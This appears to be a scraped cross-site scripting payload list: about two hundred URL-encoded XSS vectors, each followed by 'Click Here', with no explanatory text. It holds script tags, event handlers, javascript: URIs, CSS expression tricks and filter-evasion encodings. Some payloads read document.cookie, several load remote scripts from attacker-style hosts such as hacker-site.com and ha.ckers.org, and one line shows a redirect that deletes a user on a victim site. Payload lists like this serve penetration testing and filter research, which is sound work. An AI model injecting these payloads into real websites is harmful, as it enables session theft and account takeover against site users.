%3ciframe%2fonreadystatechange%3d%5cu0061%5cu006C%5cu0065%5cu0072%5cu0074('%5cu0061')%20worksinIE%3eClick Here

%3cscript%2fsrc%3d%22data%26colon%3btext%2Fj%5cu0061v%5cu0061script,%5cu0061lert('%5cu0061')%22%3e%3c%2fscript%20a%3d%5cu0061%20%26%20%2f%3d%2FClick Here

%3cscript%3e~'%5cu0061'%20%3b%20%5cu0074%5cu0068%5cu0072%5cu006F%5cu0077%20~%20%5cu0074%5cu0068%5cu0069%5cu0073%2e%20%5cu0061%5cu006C%5cu0065%5cu0072%5cu0074(~'%5cu0061')%3c%2fscript%20U%2bClick Here

%3cscript%2fsrc%3ddata%26colon%3btext%2fj%5cu0061v%5cu0061%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116,%5cu0061%6C%65%72%74(%2fXSS%2f)%3e%3c%2fscriptClick Here

%3cscript%3e%2b-%2b-1-%2b-%2balert(1)%3c%2fscript%3eClick Here

%3cobject%20data%3djavascript%26colon%3b%5cu0061%26%23x6C%3b%26%23101%72t(1)%3eClick Here

%3cbody%2fonload%3d%26lt%3b!--%26gt%3b%26%2310alert(1)%3eClick Here

%3cscript%20itworksinallbrowsers%3e%2f%2a%3cscript%2a%20%2a%2falert(1)%3c%2fscriptClick Here

%3cimg%20src%20%3fitworksonchrome%3f%5c%2fonerror%20%3d%20alert(1)Click Here

%3csvg%3e%3cscript%3e%2f%2f%26NewLine%3bconfirm(1)%3b%3c%2fscript%20%3c%2fsvg%3eClick Here

%3csvg%3e%3cscript%20onlypossibleinopera%3a-)%3e%20alert(1)Click Here

%3ca%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20aaaaaaaaa%20aaaaaaaaaa%20href%3dj%26%2397v%26%2397script%26%23x3A%3b%26%2397lert(1)%3eClickMeClick Here

%3cscript%20x%3e%20alert(1)%20%3c%2fscript%201%3d2Click Here

%3c--%60%3cimg%2fsrc%3d%60%20onerror%3dalert(1)%3e%20--!%3eClick Here

%3cdiv%2fonmouseover%3d'alert(1)'%3e%20style%3d%22x%3a%22%3eClick Here

%3cdiv%20style%3d%22position%3aabsolute%3btop%3a0%3bleft%3a0%3bwidth%3a100%%3bheight%3a100%%22%20onmouseover%3d%22prompt(1)%22%20onclick%3d%22alert(1)%22%3ex%3c%2fbutton%3eClick Here

%3cscript%2fsrc%3d%26%23100%26%2397%26%23116%26%2397%3atext%2f%26%23x6a%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x000070%26%23x074,%26%23x0061%3b%26%23x06c%3b%26%23x0065%3b%26%23x00000072%3b%26%23x00074%3b(1)%3e%3c%2fscript%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3dwindow%2eopen('https%3a%2f%2fwww%2egoogle%2ecom%2f')%3b%3eClick Here

%3cform%3e%3cbutton%20formaction%3djavascript%26colon%3balert(1)%3eCLICKMEClick Here

%3cmath%3e%3ca%20xlink%3ahref%3d%22%2f%2fjsfiddle%2enet%2ft846h%2f%22%3eclickClick Here

%3cobject%20data%3ddata%3atext%2fhtml%3bbase64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik%2b%3e%3c%2fobject%3eClick Here

%3ciframe%20src%3d%22data%3atext%2fhtml,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E%22%3e%3c%2fiframe%3eClick Here

'%3e%2f%2f%5c%5c,%3c'%3e%22%3e%22%3e%22%2a%22Click Here

''%3b!--%22%3cXSS%3e%3d%26%7b()%7dClick Here

%3cscript%3ealert(1)%3b%3c%2fscript%3eClick Here

')%3b%20alert('XSSClick Here

%3cscript%3ealert('XSS')%3b%3c%2fscript%3eClick Here

%3cIMG%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert('XSS')%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert('XSS')%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(%26quot%3bXSS%26quot%3b)%3eClick Here

%3cIMG%20%22%22%22%3e%3cSCRIPT%3ealert(%22XSS%22)%3c%2fSCRIPT%3e%22%3eClick Here

%3cscript%3ealert(String%2efromCharCode(88,83,83))%3c%2fscript%3e%20Click Here

%3cscr%3cscript%3eipt%3ealert('XSS')%3b%3c%2fscr%3c%2fscript%3eipt%3eClick Here

%3cimg%20src%3dfoo%2epng%20onerror%3dalert(%2fxssed%2f)%20%2f%3eClick Here

%3cIMG%20SRC%3d%5c%22jav%26%23x09%3bascript%3aalert('XSS')%3b%5c%22%3eClick Here

%3c%3f%20echo('%3cscr)'%3b%20echo('ipt%3ealert(%5c%22XSS%5c%22)%3c%2fscript%3e')%3b%20%3f%3eClick Here

%3cstyle%3e@im%5cport'%5cja%5cvasc%5cript%3aalert(%5c%22XSS%5c%22)'%3b%3c%2fstyle%3eClick Here

%3cmarquee%3e%3cscript%3ealert('XSS')%3c%2fscript%3e%3c%2fmarquee%3eClick Here

%3cIMG%20SRC%3d%5c%22jav%26%23x0A%3bascript%3aalert('XSS')%3b%5c%22%3eClick Here

%3cIMG%20SRC%3d%5c%22jav%26%23x0D%3bascript%3aalert('XSS')%3b%5c%22%3eClick Here

%3cscript%20src%3dhttp%3a%2f%2fyoursite%2ecom%2fyour_files%2ejs%3e%3c%2fscript%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(String%2efromCharCode(88,83,83))%3eClick Here

%22%3e%3cscript%3ealert(0)%3c%2fscript%3eClick Here

%3c%2ftitle%3e%3cscript%3ealert(%2fxss%2f)%3c%2fscript%3eClick Here

%3c%2ftextarea%3e%3cscript%3ealert(%2fxss%2f)%3c%2fscript%3eClick Here

%3cIMG%20LOWSRC%3d%5c%22javascript%3aalert('XSS')%5c%22%3eClick Here

%3cIMG%20DYNSRC%3d%5c%22javascript%3aalert('XSS')%5c%22%3eClick Here

%3cscript%20language%3d%22JavaScript%22%3ealert('XSS')%3c%2fscript%3eClick Here

%3cfont%20style%3d'color%3aexpression(alert(document%2ecookie))'%3eClick Here

%3cimg%20src%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cbody%20onunload%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cbody%20onLoad%3d%22alert('XSS')%3b%22Click Here

[color%3dred'%20onmouseover%3d%22alert('xss')%22]mouse%20over[%2fcolor]Click Here

%22%2f%3e%3c%2fa%3e%3c%2f%3e%3cimg%20src%3d1%2egif%20onerror%3dalert(1)%3eClick Here

window%2ealert(%22Bonjour%20!%22)%3bClick Here

%3cdiv%20style%3d%22x%3aexpression((window%2er%3d%3d1)%3f''%3aeval('r%3d1%3bClick Here

%3ciframe%3c%3fphp%20echo%20chr(11)%3f%3e%20onload%3dalert('XSS')%3e%3c%2fiframe%3eClick Here

alert(String%2efromCharCode(88,83,83))%3b'))%22%3eClick Here

'%3e%3e%3cmarquee%3e%3ch1%3eXSS%3c%2fh1%3e%3c%2fmarquee%3eClick Here

%22%3e%3cscript%20alert(String%2efromCharCode(88,83,83))%3c%2fscript%3eClick Here

'%22%3e%3e%3cscript%3ealert('XSS')%3c%2fscript%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%5c%22refresh%5c%22%20CONTENT%3d%5c%220%3burl%3djavascript%3aalert('XSS')%3b%5c%22%3eClick Here

'%22%3e%3e%3cmarquee%3e%3ch1%3eXSS%3c%2fh1%3e%3c%2fmarquee%3eClick Here

%3cSTYLE%20type%3d%22text%2fcss%22%3eBODY%7bbackground%3aurl(%22javascript%3aalert('XSS')%22)%7d%3c%2fSTYLE%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%5c%22refresh%5c%22%20CONTENT%3d%5c%220%3b%20URL%3dhttp%3a%2f%2f%3bURL%3djavascript%3aalert('XSS')%3b%5c%22%3eClick Here

%3cscript%3evar%20var%20%3d%201%3b%20alert(var)%3c%2fscript%3eClick Here

%3cIMG%20SRC%3d'vbscript%3amsgbox(%5c%22XSS%5c%22)'%3eClick Here

%3c%3f%3d'%3cSCRIPT%3ealert(%22XSS%22)%3c%2fSCRIPT%3e'%3f%3eClick Here

%3cFRAMESET%3e%3cFRAME%20SRC%3d%5c%22javascript%3aalert('XSS')%3b%5c%22%3e%3c%2fFRAMESET%3eClick Here

%22%20onfocus%3dalert(document%2edomain)%20%22%3e%20%3c%22Click Here

%3cSTYLE%3eli%20%7blist-style-image%3a%20url(%5c%22javascript%3aalert('XSS')%5c%22)%3b%7d%3c%2fSTYLE%3e%3cUL%3e%3cLI%3eXSSClick Here

perl%20-e%20'print%20%5c%22%3cSCR%5c0IPT%3ealert(%5c%22XSS%5c%22)%3c%2fSCR%5c0IPT%3e%5c%22%3b'%20%3e%20outClick Here

perl%20-e%20'print%20%5c%22%3cIMG%20SRC%3djava%5c0script%3aalert(%5c%22XSS%5c%22)%3e%5c%22%3b'%20%3e%20outClick Here

%3cbr%20size%3d%5c%22%26%7balert('XSS')%7d%5c%22%3eClick Here

%3cscrscriptipt%3ealert(1)%3c%2fscrscriptipt%3eClick Here

%3c%2fbr%20style%3da%3aexpression(alert())%3eClick Here

%3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3eClick Here

%22%3e%3cBODY%20onload!%23$%%26()%2a~%2b-_%2e,%3a%3b%3f@[%2f%7c%5c]%5e%60%3dalert(%22XSS%22)%3eClick Here

%3cBASE%20HREF%3d%22javascript%3aalert('XSS')%3b%2f%2f%22%3eClick Here

[color%3dred%20width%3dexpression(alert(123))][color]Click Here

Execute(MsgBox(chr(88)%26chr(83)%26chr(83)))%3cClick Here

%22%3e%3c%2fiframe%3e%3cscript%3ealert(123)%3c%2fscript%3eClick Here

%3cbody%20onLoad%3d%22while(true)%20alert('XSS')%3b%22%3eClick Here

'%22%3e%3c%2ftitle%3e%3cscript%3ealert(1111)%3c%2fscript%3eClick Here

'%22%22%3e%3cscript%20language%3d%22JavaScript%22%3e%20alert('X%20%5cnS%20%5cnS')%3b%3c%2fscript%3eClick Here

%3c%2ftextarea%3e'%22%3e%3cscript%3ealert(document%2ecookie)%3c%2fscript%3eClick Here

%3c%2fscript%3e%3c%2fscript%3e%3c%3c%3c%3cscript%3e%3c%3e%3e%3e%3e%3c%3c%3cscript%3ealert(123)%3c%2fscript%3eClick Here

%3chtml%3e%3cnoalert%3e%3cnoscript%3e(123)%3c%2fnoscript%3e%3cscript%3e(123)%3c%2fscript%3eClick Here

%3cINPUT%20TYPE%3d%22IMAGE%22%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

'%3e%22%3e%3cscript%20src%20%3d%20'http%3a%2f%2fwww%2esite%2ecom%2fXSS%2ejs'%3e%3c%2fscript%3eClick Here

'%3e%3c%2fselect%3e%3cscript%3ealert(123)%3c%2fscript%3eClick Here

%7d%3c%2fstyle%3e%3cscript%3ea%3deval%3bb%3dalert%3ba(b(%2fXSS%2f%2esource))%3b%3c%2fscript%3eClick Here

a%3d%22get%22%3bb%3d%22URL%22%3bc%3d%22javascript%3a%22%3bd%3d%22alert('xss')%3b%22%3beval(a%2bb%2bc%2bd)%3bClick Here

%3cSCRIPT%3edocument%2ewrite(%22XSS%22)%3b%3c%2fSCRIPT%3eClick Here

%3d'%3e%3cscript%3ealert(%22xss%22)%3c%2fscript%3eClick Here

%3cscript%2bsrc%3d%22%3e%22%2bsrc%3d%22http%3a%2f%2fyoursite%2ecom%2fxss%2ejs%3f69,69%22%3e%3c%2fscript%3eClick Here

%22%3e%2fXaDoS%2f%3e%3cscript%3ealert(document%2ecookie)%3c%2fscript%3e%3cscript%20src%3d%22http%3a%2f%2fwww%2esite%2ecom%2fXSS%2ejs%22%3e%3c%2fscript%3eClick Here

%22%3e%2fKinG-InFeT%2eNeT%2f%3e%3cscript%3ealert(document%2ecookie)%3c%2fscript%3eClick Here

%3cbody%20background%3djavascript%3a'%22%3e%3cscript%3ealert(navigator%2euserAgent)%3c%2fscript%3e%3e%3c%2fbody%3eClick Here

src%3d%22http%3a%2f%2fwww%2esite%2ecom%2fXSS%2ejs%22%3e%3c%2fscript%3eClick Here

data%3atext%2fhtml%3bcharset%3dutf-7%3bbase64,Ij48L3RpdGxlPjxzY3JpcHQ%2bYWxlcnQoMTMzNyk8L3NjcmlwdD4%3dClick Here

!--%22%20%2f%3e%3cscript%3ealert('xss')%3b%3c%2fscript%3eClick Here

%3cscript%3ealert(%22XSS%20by%20%5cnxss%22)%3c%2fscript%3e%3cmarquee%3e%3ch1%3eXSS%20by%20xss%3c%2fh1%3e%3c%2fmarquee%3eClick Here

%22%3e%3cscript%3ealert(%22XSS%20by%20%5cnxss%22)%3c%2fscript%3e%3e%3cmarquee%3e%3ch1%3eXSS%20by%20xss%3c%2fh1%3e%3c%2fmarquee%3eClick Here

%3cimg%20%22%22%22%3e%3cscript%3ealert(%22XSS%20by%20%5cnxss%22)%3c%2fscript%3e%3cmarquee%3e%3ch1%3eXSS%20by%20xss%3c%2fh1%3e%3c%2fmarquee%3eClick Here

'%22%3e%3c%2ftitle%3e%3cscript%3ealert(%22XSS%20by%20%5cnxss%22)%3c%2fscript%3e%3e%3cmarquee%3e%3ch1%3eXSS%20by%20xss%3c%2fh1%3e%3c%2fmarquee%3eClick Here

%3cscript%3ealert(1337)%3c%2fscript%3e%3cmarquee%3e%3ch1%3eXSS%20by%20xss%3c%2fh1%3e%3c%2fmarquee%3eClick Here

'%22%3e%3c%2ftitle%3e%3cscript%3ealert(1337)%3c%2fscript%3e%3e%3cmarquee%3e%3ch1%3eXSS%20by%20xss%3c%2fh1%3e%3c%2fmarquee%3eClick Here

%3ciframe%20src%3d%22javascript%3aalert('XSS%20by%20%5cnxss')%3b%22%3e%3c%2fiframe%3e%3cmarquee%3e%3ch1%3eXSS%20by%20xss%3c%2fh1%3e%3c%2fmarquee%3eClick Here

%22%3e%3cscript%3ealert(1337)%3c%2fscript%3e%22%3e%3cscript%3ealert(%22XSS%20by%20%5cnxss%3c%2fh1%3e%3c%2fmarquee%3eClick Here

%22%3e%3cSCRIPT%3ealert(String%2efromCharCode(88,83,83))%3c%2fSCRIPT%3e%3cimg%20src%3d%22%22%20alt%3d%22Click Here

http%3a%2f%2fwww%2esimpatie%2ero%2findex%2ephp%3fpage%3dfriends%26member%3d781339%26javafunctionname%3dPageclick%26javapgno%3d2%20javapgno%3d2%20%3f%3fXSS%3f%3fClick Here

'%3e%3cSCRIPT%3ealert(String%2efromCharCode(88,83,83))%3c%2fSCRIPT%3e%3cimg%20src%3d%22%22%20alt%3d'Click Here

%5c'%3e%3cSCRIPT%3ealert(String%2efromCharCode(88,83,83))%3c%2fSCRIPT%3e%3cimg%20src%3d%22%22%20alt%3d%5c'Click Here

http%3a%2f%2fwww%2esimpatie%2ero%2findex%2ephp%3fpage%3dtop_movies%26cat%3d13%26p%3d2%20p%3d2%20%3f%3fXSS%3f%3fClick Here

')%3b%20alert('xss')%3b%20var%20x%3d'Click Here

%5c%5c')%3b%20alert(%5c'xss%5c')%3bvar%20x%3d%5c'Click Here

%2f%2f--%3e%3c%2fSCRIPT%3e%3cSCRIPT%3ealert(String%2efromCharCode(88,83,83))%3bClick Here

%3e%22%3e%3cScRiPt%20%0a%0d%3ealert(561177485777)%3B%3c%2fScRiPt%3eClick Here

%3c%2fbody%3eClick Here

%3c%2fhtml%3eClick Here

%3cSCRIPT%20SRC%3dhttp%3a%2f%2fhacker-site%2ecom%2fxss%2ejs%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%3e%20alert(XSS)%3b%20%3c%2fSCRIPT%3eClick Here

%3cBODY%20ONLOAD%3dalert(%22XSS%22)%3eClick Here

%3cBODY%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cIMG%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20DYNSRC%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cIFRAME%20SRC%3dhttp%3a%2f%2fhacker-site%2ecom%2fxss%2ehtml%3eClick Here

%3cIMG%20LOWSRC%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cINPUT%20TYPE%3d%22IMAGE%22%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cLINK%20REL%3d%22stylesheet%22%20HREF%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cTABLE%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cTD%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cDIV%20STYLE%3d%22width%3a%20expression(alert('XSS'))%3b%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%20url(javascript%3aalert('XSS'))%22%3eClick Here

%3cOBJECT%20TYPE%3d%22text%2fx-scriptlet%22%20DATA%3d%22http%3a%2f%2fhacker%2ecom%2fxss%2ehtml%22%3eClick Here

%3cEMBED%20SRC%3d%22http%3a%2f%2fhacker%2ecom%2fxss%2eswf%22%20AllowScriptAccess%3d%22always%22%3eClick Here

%26lt%3bSCRIPT%26gt%3balert(%26apos%3bXSS%26apos%3b)%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26apos%3b%26apos%3b%3b!--%26quot%3b%26lt%3bXSS%26gt%3b%3d%26amp%3b%7b()%7dClick Here

%26lt%3bSCRIPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%26gt%3balert(String%2efromCharCode(88,83,83))%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bBASE%20HREF%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%2f%2f%26quot%3b%26gt%3bClick Here

%26lt%3bBGSOUND%20SRC%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bBODY%20BACKGROUND%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bDIV%20STYLE%3d%26quot%3bbackground-image%3a%20url(javascript%3aalert(%26apos%3bXSS%26apos%3b))%26quot%3b%26gt%3bClick Here

%26lt%3bBODY%20ONLOAD%3dalert(%26apos%3bXSS%26apos%3b)%26gt%3bClick Here

%26lt%3bDIV%20STYLE%3d%26quot%3bwidth%3a%20expression(alert(%26apos%3bXSS%26apos%3b))%3b%26quot%3b%26gt%3bClick Here

%26lt%3bFRAMESET%26gt%3b%26lt%3bFRAME%20SRC%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3b%26lt%3b%2fFRAMESET%26gt%3bClick Here

%26lt%3bDIV%20STYLE%3d%26quot%3bbackground-image%3a%20url(%26amp%3b%231%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b))%26quot%3b%26gt%3bClick Here

%26lt%3bINPUT%20TYPE%3d%26quot%3bIMAGE%26quot%3b%20SRC%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bIFRAME%20SRC%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3b%26lt%3b%2fIFRAME%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bIMG%20SRC%3djavascript%3aalert(%26apos%3bXSS%26apos%3b)%26gt%3bClick Here

%26lt%3bIMG%20LOWSRC%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bIMG%20DYNSRC%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%26quot%3bhttp%3a%2f%2fwww%2ethesiteyouareon%2ecom%2fsomecommand%2ephp%3fsomevariables%3dmaliciouscode%26quot%3b%26gt%3bClick Here

Redirect%20302%20%2fa%2ejpg%20http%3a%2f%2fvictimsite%2ecom%2fadmin%2easp%26amp%3bdeleteuserClick Here

exp%2f%2a%26lt%3bXSS%20STYLE%3d%26apos%3bno%5cxss%3anoxss(%26quot%3b%2a%2f%2f%2a%26quot%3b)%3bClick Here

%26lt%3bIMG%20SRC%3d%26apos%3bvbscript%3amsgbox(%26quot%3bXSS%26quot%3b)%26apos%3b%26gt%3bClick Here

%26lt%3bSTYLE%26gt%3bli%20%7blist-style-image%3a%20url(%26quot%3bjavascript%3aalert(%26%2339%3bXSS%26%2339%3b)%26quot%3b)%3b%7d%26lt%3b%2fSTYLE%26gt%3b%26lt%3bUL%26gt%3b%26lt%3bLI%26gt%3bXSSClick Here

%26lt%3bLAYER%20SRC%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%26quot%3b%26gt%3b%26lt%3b%2fLAYER%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%26quot%3blivescript%3a[code]%26quot%3b%26gt%3bClick Here

%BCscript%BEalert(%A2XSS%A2)%BC%2fscript%BEClick Here

%26lt%3bMETA%20HTTP-EQUIV%3d%26quot%3brefresh%26quot%3b%20CONTENT%3d%26quot%3b0%3burl%3djavascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bMETA%20HTTP-EQUIV%3d%26quot%3brefresh%26quot%3b%20CONTENT%3d%26quot%3b0%3burl%3ddata%3atext%2fhtml%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%26quot%3b%26gt%3bClick Here

%26lt%3bMETA%20HTTP-EQUIV%3d%26quot%3brefresh%26quot%3b%20CONTENT%3d%26quot%3b0%3b%20URL%3dhttp%3a%2f%2f%3bURL%3djavascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%26quot%3bmocha%3a[code]%26quot%3b%26gt%3bClick Here

%26lt%3bOBJECT%20TYPE%3d%26quot%3btext%2fx-scriptlet%26quot%3b%20DATA%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%26quot%3b%26gt%3b%26lt%3b%2fOBJECT%26gt%3bClick Here

%26lt%3bOBJECT%20classid%3dclsid%3aae24fdae-03c6-11d1-8b76-0080c744f389%26gt%3b%26lt%3bparam%20name%3durl%20value%3djavascript%3aalert(%26apos%3bXSS%26apos%3b)%26gt%3b%26lt%3b%2fOBJECT%26gt%3bClick Here

%26lt%3bEMBED%20SRC%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2eswf%26quot%3b%20AllowScriptAccess%3d%26quot%3balways%26quot%3b%26gt%3b%26lt%3b%2fEMBED%26gt%3bClick Here

%26lt%3bSTYLE%20TYPE%3d%26quot%3btext%2fjavascript%26quot%3b%26gt%3balert(%26apos%3bXSS%26apos%3b)%3b%26lt%3b%2fSTYLE%26gt%3bClick Here

%26lt%3bIMG%20STYLE%3d%26quot%3bxss%3aexpr%2f%2aXSS%2a%2fession(alert(%26apos%3bXSS%26apos%3b))%26quot%3b%26gt%3bClick Here

%26lt%3bXSS%20STYLE%3d%26quot%3bxss%3aexpression(alert(%26apos%3bXSS%26apos%3b))%26quot%3b%26gt%3bClick Here

%26lt%3bSTYLE%26gt%3b%2eXSS%7bbackground-image%3aurl(%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%26quot%3b)%3b%7d%26lt%3b%2fSTYLE%26gt%3b%26lt%3bA%20CLASS%3dXSS%26gt%3b%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bSTYLE%20type%3d%26quot%3btext%2fcss%26quot%3b%26gt%3bBODY%7bbackground%3aurl(%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%26quot%3b)%7d%26lt%3b%2fSTYLE%26gt%3bClick Here

%26lt%3bLINK%20REL%3d%26quot%3bstylesheet%26quot%3b%20HREF%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bLINK%20REL%3d%26quot%3bstylesheet%26quot%3b%20HREF%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss%26quot%3b%26gt%3bClick Here

%26lt%3bSTYLE%26gt%3b@import%26apos%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss%26apos%3b%3b%26lt%3b%2fSTYLE%26gt%3bClick Here

%26lt%3bMETA%20HTTP-EQUIV%3d%26quot%3bLink%26quot%3b%20Content%3d%26quot%3b%26lt%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss%26gt%3b%3b%20REL%3dstylesheet%26quot%3b%26gt%3bClick Here

%26lt%3bTABLE%20BACKGROUND%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%26quot%3b%26gt%3b%26lt%3b%2fTABLE%26gt%3bClick Here

%26lt%3bSTYLE%26gt%3bBODY%7b-moz-binding%3aurl(%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxssmoz%2exml%23xss%26quot%3b)%7d%26lt%3b%2fSTYLE%26gt%3bClick Here

%26lt%3bHTML%20xmlns%3axss%26gt%3bClick Here

%26lt%3bTABLE%26gt%3b%26lt%3bTD%20BACKGROUND%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%26quot%3b%26gt%3b%26lt%3b%2fTD%26gt%3b%26lt%3b%2fTABLE%26gt%3bClick Here

%26lt%3bXML%20ID%3dI%26gt%3b%26lt%3bX%26gt%3b%26lt%3bC%26gt%3b%26lt%3b![CDATA[%26lt%3bIMG%20SRC%3d%26quot%3bjavas]]%26gt%3b%26lt%3b![CDATA[cript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3b]]%26gt%3bClick Here

%26lt%3bXML%20SRC%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxsstest%2exml%26quot%3b%20ID%3dI%26gt%3b%26lt%3b%2fXML%26gt%3bClick Here

%26lt%3b!--[if%20gte%20IE%204]%26gt%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Click Here

%26lt%3bHTML%26gt%3b%26lt%3bBODY%26gt%3bClick Here

%26lt%3bMETA%20HTTP-EQUIV%3d%26quot%3bSet-Cookie%26quot%3b%20Content%3d%26quot%3bUSERID%3d%26lt%3bSCRIPT%26gt%3balert(%26apos%3bXSS%26apos%3b)%26lt%3b%2fSCRIPT%26gt%3b%26quot%3b%26gt%3bClick Here

%26lt%3bXSS%20STYLE%3d%26quot%3bbehavior%3a%20url(http%3a%2f%2fha%2eckers%2eorg%2fxss%2ehtc)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bSCRIPT%20SRC%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejpg%26quot%3b%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3b%3f%20echo(%26apos%3b%26lt%3bSCR)%26apos%3b%3bClick Here

%26lt%3bIMG%20SRC%3dJaVaScRiPt%3aalert(%26apos%3bXSS%26apos%3b)%26gt%3bClick Here

%26lt%3bBR%20SIZE%3d%26quot%3b%26amp%3b%7balert(%26apos%3bXSS%26apos%3b)%7d%26quot%3b%26gt%3bClick Here

%26lt%3bIMG%20SRC%3djavascript%3aalert(%26amp%3bquot%3bXSS%26amp%3bquot%3b)%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%60javascript%3aalert(%26quot%3bRSnake%20says,%20%26apos%3bXSS%26apos%3b%26quot%3b)%60%26gt%3bClick Here

%26lt%3bIMG%20SRC%3djavascript%3aalert(String%2efromCharCode(88,83,83))%26gt%3bClick Here

%5c%26quot%3b%3balert(%26apos%3bXSS%26apos%3b)%3b%2f%2fClick Here

%26lt%3bHEAD%26gt%3b%26lt%3bMETA%20HTTP-EQUIV%3d%26quot%3bCONTENT-TYPE%26quot%3b%20CONTENT%3d%26quot%3btext%2fhtml%3b%20charset%3dUTF-7%26quot%3b%26gt%3b%20%26lt%3b%2fHEAD%26gt%3b%2bADw-SCRIPT%2bAD4-alert(%26apos%3bXSS%26apos%3b)%3b%2bADw-%2fSCRIPT%2bAD4-Click Here

%26lt%3b%2fTITLE%26gt%3b%26lt%3bSCRIPT%26gt%3balert(%22XSS%22)%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%26quot%3bjav%26%23x09%3bascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bSTYLE%26gt%3b@im%5cport%26apos%3b%5cja%5cvasc%5cript%3aalert(%26quot%3bXSS%26quot%3b)%26apos%3b%3b%26lt%3b%2fSTYLE%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%26quot%3bjav%26amp%3b%23x09%3bascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%26quot%3bjav%26amp%3b%23x0A%3bascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%26quot%3bjav%26amp%3b%23x0D%3bascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

perl%20-e%20%26apos%3bprint%20%26quot%3b%26lt%3bIMG%20SRC%3djava%5c0script%3aalert(%26quot%3bXSS%26quot%3b)%3e%26quot%3b%3b%26apos%3b%26gt%3b%20outClick Here

